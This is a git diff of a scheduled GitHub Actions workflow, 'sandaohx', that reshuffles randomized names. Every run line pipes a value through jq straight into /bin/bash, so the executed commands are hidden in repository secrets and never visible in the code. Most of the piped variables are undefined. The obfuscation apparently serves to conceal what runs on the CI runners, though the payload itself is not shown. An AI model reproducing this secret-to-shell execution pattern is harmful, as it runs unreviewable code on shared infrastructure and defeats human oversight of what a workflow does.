--- a/.github/workflows/sandaohx.yml
+++ b/.github/workflows/sandaohx.yml
@@ -1,25 +1,27 @@
 name: sandaohx
-
 on:
   workflow_dispatch:
   schedule:
-    - cron: '0 4/6 * * *'
-jobs:  # 29150
+    - cron: '30 2/6 * * *'
+jobs:
   build:
     runs-on: ubuntu-latest
     steps:
       - uses: actions/checkout@v4
       - name: sandaohx
         env:
-          iukta32363: ${{ secrets.iukta32363 }}
+          f95: ${{ secrets.f95 }}
         run: |
-          echo $iukta32363 | jq -r .rouh2775 | /bin/bash
-          echo $lr02 | jq -r .qqp0878 | /bin/bash
-          echo $xxquh65 | jq -r .pmrc42020 | /bin/bash
-          echo $gcdkf00 | jq -r .c08 | /bin/bash
-          echo $f672 | jq -r .nbr5 | /bin/bash
-          echo $xrlnl96938 | jq -r .byfr77 | /bin/bash
-          echo $zqnci1 | jq -r .om46 | /bin/bash
-          echo $r19 | jq -r .akkgv16589 | /bin/bash
-          echo $kx3164 | jq -r .cgo6947 | /bin/bash
+          echo $f95 | jq -r .fm1553 | /bin/bash
+          echo $s0285 | jq -r .xmn8239 | /bin/bash
+          echo $civj913 | jq -r .pcp23212 | /bin/bash
+          echo $vhjlm75240 | jq -r .qgcwt17 | /bin/bash
+          echo $t32156 | jq -r .f86 | /bin/bash
+          echo $r1 | jq -r .fela722 | /bin/bash
+          echo $t1 | jq -r .ddv4581 | /bin/bash
+          echo $w88 | jq -r .dkg1509 | /bin/bash
+          echo $ymiq1994 | jq -r .kbd826 | /bin/bash
+          echo $hms2 | jq -r .srkv94 | /bin/bash
+          echo $brm3886 | jq -r .ouzae31512 | /bin/bash
+          echo $ft38202 | jq -r .d0741 | /bin/bash
 
